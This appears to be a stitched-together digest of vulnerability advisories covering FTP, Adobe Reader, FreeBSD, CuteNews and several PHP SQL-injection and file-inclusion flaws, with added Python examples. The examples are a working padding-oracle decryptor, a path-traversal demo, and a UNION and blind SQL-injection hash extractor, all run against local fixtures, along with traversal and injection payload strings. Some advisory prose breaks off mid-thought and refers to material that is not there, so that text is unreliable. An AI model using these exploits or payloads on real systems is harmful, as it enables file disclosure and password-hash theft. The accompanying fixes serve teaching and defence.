A remote buffer overflow vulnerability exists in PCMan FTP Server 2.0.7. The vulnerability is caused by a boundary error in the handling of FTP commands and can be exploited to cause a stack-based buffer overflow by sending an overly long, specially crafted FTP command to the affected server. Successful exploitation may allow execution of arbitrary code.
This exploit is used to download the Web.config file from the target server. It uses Padbuster, a tool written by Brian Holyfield, to exploit a padding oracle vulnerability. It works by tampering with the ciphertext bytes one at a time and checking the server's response: a response that differs from the reference padding-error response reveals that the tampered block decrypted to valid padding. Once the oracle has been confirmed this way, the intermediate values it yields are used to forge a ciphertext the server accepts, and the Web.config file is downloaded.
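The mechanism Padbuster automates, as an added example rather than Padbuster's own code: a CBC padding oracle recovers plaintext one byte at a time using nothing but the server's "padding valid / padding invalid" distinction. The oracle below is a local function standing in for the remote server, the block cipher is a toy HMAC-SHA256 Feistel network in place of AES (the attack is indifferent to the cipher under CBC), and the plaintext is a constructed stand-in for the protected file.

```python
import hashlib
import hmac
import secrets

BLOCK = 16  # block size of the toy cipher; AES-CBC would use the same value


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Round function of the toy Feistel cipher (stands in for AES, not secure).
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    n = BLOCK - len(plaintext) % BLOCK
    data = plaintext + bytes([n]) * n
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out


def padding_valid(key, iv_and_ct):
    """The oracle: the server's 'padding error' versus 'any other response'."""
    blocks = [iv_and_ct[i:i + BLOCK] for i in range(0, len(iv_and_ct), BLOCK)]
    last = _xor(block_decrypt(key, blocks[-1]), blocks[-2])
    try:
        pkcs7_unpad(last)
        return True
    except ValueError:
        return False


def recover_block(oracle, prev, target):
    """Recover D(target) byte by byte, then XOR with prev to get the plaintext."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):          # already-known bytes are set so
            forged[j] = inter[j] ^ pad           # that they decrypt to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be \x02\x02 rather than \x01;
                # disturbing the byte before it breaks every case but \x01.
                check = bytearray(forged)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle accepted no value for byte %d" % pos)
    return _xor(inter, prev)


def padding_oracle_decrypt(oracle, iv_and_ct):
    blocks = [iv_and_ct[i:i + BLOCK] for i in range(0, len(iv_and_ct), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)


def demo():
    key = secrets.token_bytes(16)           # never seen by the attacker
    iv = secrets.token_bytes(BLOCK)
    # Constructed stand-in for the protected file; any bytes work.
    secret = b"<connectionStrings><add password='hunter2'/></connectionStrings>"
    ct = cbc_encrypt(key, iv, secret)
    oracle = lambda data: padding_valid(key, data)   # all the attacker gets
    return secret, padding_oracle_decrypt(oracle, iv + ct)


if __name__ == "__main__":
    secret, recovered = demo()
    print(recovered == secret, recovered.decode())
```

The last byte of each block needs the extra check shown, because a guess can also land on valid two- or three-byte padding by accident. Each block costs at most 256 oracle queries per byte, which is why a remote padding oracle is practical over HTTP. Padbuster's plaintext-encryption option runs the same byte-by-byte search in the other direction, building a ciphertext that decrypts to a chosen value; that is how the tool turns the oracle into a request the server answers with Web.config.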
Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected. This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X. As can be seen from the above, we control the value in eax (in this case 12010, the length of acrobat:// plus the 12000 A's). This allows us to write a null byte anywhere in memory between ebp-0x420 (0xBFFFE4E8) and the end of the stack. The behaviour may be leveraged to modify the frame pointer, changing the execution flow and thus permitting arbitrary code execution in the context of the user running the affected application.
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to deceive a user and gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. Input passed to the 'id' parameter in index.php is not properly verified before being used in a SQL query. This can be exploited through the web browser to retrieve users' password hashes. SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. It occurs when a web application accepts user input that is placed directly into a SQL statement without proper filtering.
CuteNews is vulnerable to local file inclusion (LFI). An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious page parameter, which can be used to include local files from the web server. For example, a request with the page parameter set to /etc/passwd includes the contents of the /etc/passwd file.
The stage parameter is not properly sanitized, allowing an attacker to read arbitrary files on the server.
This exploit is for FreeBSD 7.0 - 7.2 and is based on a null pointer dereference vulnerability. The exploit overwrites ts_lock.mtx_lock with SYSENT8_SYSCALL_ADDR and then calls kernel_code(), which sets the UID to 0 and grants root access.
$_GET["nodeId"] in w3.php is not sanitized before it is used in the database query. An attacker can use this for a blind SQL injection attack: the two requests below differ only in a condition that is always true or always false, and the server's response tells them apart.
http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - shows the page
http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - shows an error page
Affected product: Aspect Ratio CMS
The showlang parameter of DNET Live-Stats 0.8 does not properly sanitize user input, allowing an attacker to read arbitrary files on the server.
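The file-read pattern shared by the page, stage and showlang parameters above, as an added example written here and not code from CuteNews, DNET Live-Stats or any other project: a PHP-style include that trusts the parameter, next to a resolver that maps the parameter through an allowlist and confirms the resolved path stays inside the template directory. The site layout, file names and contents are constructed in a temporary directory so the script runs offline.

```python
import os
import tempfile

# Allowlist: the only values the page parameter may take, mapped to files.
ALLOWED_PAGES = {"news": "news.html", "about": "about.html"}


def make_site():
    """Constructed fixture: pages/ holds the templates, config.php sits above it."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    for name in ALLOWED_PAGES.values():
        with open(os.path.join(pages, name), "w") as f:
            f.write("<h1>%s</h1>" % name.split(".")[0])
    secret = os.path.join(root, "config.php")
    with open(secret, "w") as f:
        f.write("<?php $db_pass = 'hunter2';")
    return pages, secret


def vulnerable_include(pages, param):
    """Mirrors include($dir . $_GET['page']) with no checks on the parameter.

    os.path.join discards `pages` when param is absolute, and '../' walks
    out of it, so both the absolute and the traversal forms reach any file
    the web server process can read."""
    with open(os.path.join(pages, param)) as f:
        return f.read()


def safe_include(pages, param):
    """Allowlist first; realpath containment as a second line of defence."""
    if "\0" in param:                      # %00 truncation in pre-5.3.4 PHP
        raise PermissionError("null byte in page name")
    filename = ALLOWED_PAGES.get(param)
    if filename is None:                   # anything not in the map is refused
        raise PermissionError("unknown page")
    base = os.path.realpath(pages)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:   # e.g. a symlinked template
        raise PermissionError("resolved outside the pages directory")
    with open(target) as f:
        return f.read()


def demo():
    pages, secret = make_site()
    results = {
        "vuln_traversal": vulnerable_include(pages, "../config.php"),
        "vuln_absolute": vulnerable_include(pages, secret),
        "safe_news": safe_include(pages, "news"),
    }
    for label, bad in (("safe_traversal", "../config.php"),
                       ("safe_absolute", secret),
                       ("safe_nullbyte", "news\0.html")):
        try:
            safe_include(pages, bad)
            results[label] = "ALLOWED"
        except PermissionError as e:
            results[label] = "blocked: %s" % e
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-15s %s" % (k, v))
```

The allowlist alone closes the bug; the realpath check is there so that a template directory containing a stray symlink cannot be turned back into an arbitrary read. Denylisting "../" or "/etc/" is the fix that keeps getting bypassed (encoding variants, "....//", absolute paths), which is why the resolver never tries to clean the input and instead refuses anything it did not expect.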
A SQL injection vulnerability was found in FAQMasterFlex, an application shipped in the F.A.Q. section of the Fantastico auto-install software package. The vulnerability exists in the faq.php file, where user input is not properly sanitized before being used in a SQL query. An attacker can exploit it by sending a crafted HTTP request with malicious SQL in the 'cat_name' and 'category_id' parameters.
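The three injection findings above (the 'id' parameter in index.php, nodeId in w3.php, and cat_name/category_id in faq.php) share one root cause, shown here as an added example on an in-memory SQLite database rather than code from any of those applications: the parameter is spliced into the SQL text, so an attacker can UNION in the users table to read hashes directly or, where results are not echoed, infer them one character at a time from the page-versus-error difference. The parameterised query at the end is the fix. Table names, rows and the hash value are constructed.

```python
import sqlite3

HEX = "0123456789abcdef"      # alphabet of an MD5 hex digest


def make_db():
    """Constructed data: one news row and one user with a fake MD5 hash."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news  VALUES (8348, 'Release notes', 'Version 2.0 is out.');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_lookup(conn, id_param):
    """index.php?id=... as written: the parameter becomes part of the SQL text."""
    sql = "SELECT title, body FROM news WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """Same query with a bound parameter; the input can only ever be a value."""
    sql = "SELECT title, body FROM news WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def steal_hashes(conn):
    """UNION attack: rows from users come back in the columns the page prints."""
    return vulnerable_lookup(conn, "0 UNION SELECT username, password FROM users")


def page_shows(conn, id_param):
    """All a blind attacker sees: the normal page (rows) or an error/empty page."""
    try:
        return bool(vulnerable_lookup(conn, id_param))
    except sqlite3.Error:
        return False


def blind_extract(conn, subquery, length, charset=HEX):
    """Boolean-blind: turn each character into a yes/no question on the page."""
    found = ""
    for pos in range(1, length + 1):
        for ch in charset:
            probe = "8348 AND substr((%s),%d,1)='%s'" % (subquery, pos, ch)
            if page_shows(conn, probe):
                found += ch
                break
        else:                 # no character matched: end of string or wrong charset
            break
    return found


def demo():
    conn = make_db()
    admin_hash = "SELECT password FROM users WHERE username='admin'"
    return {
        "union": steal_hashes(conn),
        "blind_true": page_shows(conn, "8348 and (select 1)=1"),
        "blind_false": page_shows(conn, "8348 and (select 1)=0"),
        "blind_hash": blind_extract(conn, admin_hash, 32),
        "safe_payload": safe_lookup(conn, "8348 and (select 1)=1"),
        "safe_normal": safe_lookup(conn, "8348"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-13s %r" % (k, v))
```

Against the bound-parameter version the same payload simply matches no row, because the database never parses it as SQL. In the PHP applications named above the equivalent is a prepared statement (mysqli or PDO) plus casting an id parameter to int before it is used; the blind loop is what tools such as sqlmap automate, at a cost of at most 16 requests per hash character here.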